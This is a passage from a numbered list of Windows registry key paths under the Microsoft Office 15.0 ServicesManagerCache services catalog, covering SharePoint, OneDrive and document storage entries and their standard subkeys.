  860. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SupportsMultiple",
  861. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\CapabilitiesMetadata",
  862. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Description",
  863. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Name",
  864. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceId",
  865. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceUrl",
  866. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata",
  867. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\KeyTip",
  868. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\Type",
  869. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails",
  870. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url16x16",
  871. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url32x32",
  872. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url48x48",
  873. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP",
  874. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Capabilities",
  875. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ConnectMechanism",
  876. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsManaged",
  877. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsRemovable",
  878. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceOwner",
  879. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SortOrder",
  880. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SupportsMultiple",
  881. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\CapabilitiesMetadata",
  882. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Description",
  883. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Name",
  884. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceId",
  885. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceUrl",
  886. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata",
  887. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\KeyTip",
  888. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\Type",
  889. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails",
  890. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  891. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  892. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  893. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT",
  894. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Capabilities",
  895. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ConnectMechanism",
  896. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsManaged",
  897. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsRemovable",
  898. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceOwner",
  899. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SortOrder",
  900. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SupportsMultiple",
  901. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\CapabilitiesMetadata",
  902. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Description",
  903. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Name",
  904. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceId",
  905. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceUrl",
  906. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata",
  907. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\KeyTip",
  908. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\Type",
  909. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails",
  910. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url16x16",
  911. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url32x32",
  912. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url48x48",
  913. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP",
  914. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Capabilities",
  915. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ConnectMechanism",
  916. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsManaged",
  917. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsRemovable",
  918. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceOwner",
  919. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SortOrder",
  920. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SupportsMultiple",
  921. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\CapabilitiesMetadata",
  922. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Description",
  923. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Name",
  924. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceId",
  925. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceUrl",
  926. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata",
  927. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\KeyTip",
  928. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\Type",
  929. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails",
  930. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  931. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  932. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  933. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED",
  934. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Capabilities",
  935. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ConnectMechanism",
  936. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsManaged",
  937. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsRemovable",
  938. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceOwner",
  939. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SortOrder",
  940. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SupportsMultiple",
  941. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\CapabilitiesMetadata",
  942. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Description",
  943. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Name",
  944. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceId",
  945. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceUrl",
  946. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata",
  947. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\KeyTip",
  948. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\Type",
  949. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT",
  950. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Capabilities",
  951. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ConnectMechanism",
  952. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsManaged",
  953. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsRemovable",
  954. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceOwner",
  955. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SortOrder",
  956. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SupportsMultiple",
  957. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\CapabilitiesMetadata",
  958. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Description",
  959. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Name",
  960. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceId",
  961. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceUrl",
  962. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata",
  963. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\DefaultFolderRelativePath",
  964. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\KeyTip",
  965. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\Type",
  966. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails",
  967. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url16x16",
  968. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url32x32",
  969. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url48x48",
  970. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP",
  971. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Capabilities",
  972. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ConnectMechanism",
  973. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsManaged",
  974. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsRemovable",
  975. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceOwner",
  976. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SortOrder",
  977. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SupportsMultiple",
  978. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\CapabilitiesMetadata",
  979. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Description",
  980. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Name",
  981. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceId",
  982. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceUrl",
  983. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata",
  984. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\KeyTip",
  985. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\Type",
  986. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails",
  987. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  988. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  989. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  990. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER",
  991. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Capabilities",
  992. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ConnectMechanism",
  993. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsManaged",
  994. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsRemovable",
  995. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceOwner",
  996. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SortOrder",
  997. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SupportsMultiple",
  998. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\CapabilitiesMetadata",
  999. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Description",
  1000. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Name",
  1001. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceId",
  1002. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceUrl",
  1003. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata",
  1004. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\HideIfEmpty",
  1005. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\KeyTip",
  1006. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\Type",
  1007. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails",
  1008. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url16x16",
  1009. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url32x32",
  1010. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url48x48",
  1011. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE",
  1012. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Capabilities",
  1013. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ConnectMechanism",
  1014. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsManaged",
  1015. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsRemovable",
  1016. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceOwner",
  1017. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SortOrder",
  1018. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SupportsMultiple",
  1019. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\CapabilitiesMetadata",
  1020. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Description",
  1021. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Name",
  1022. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceId",
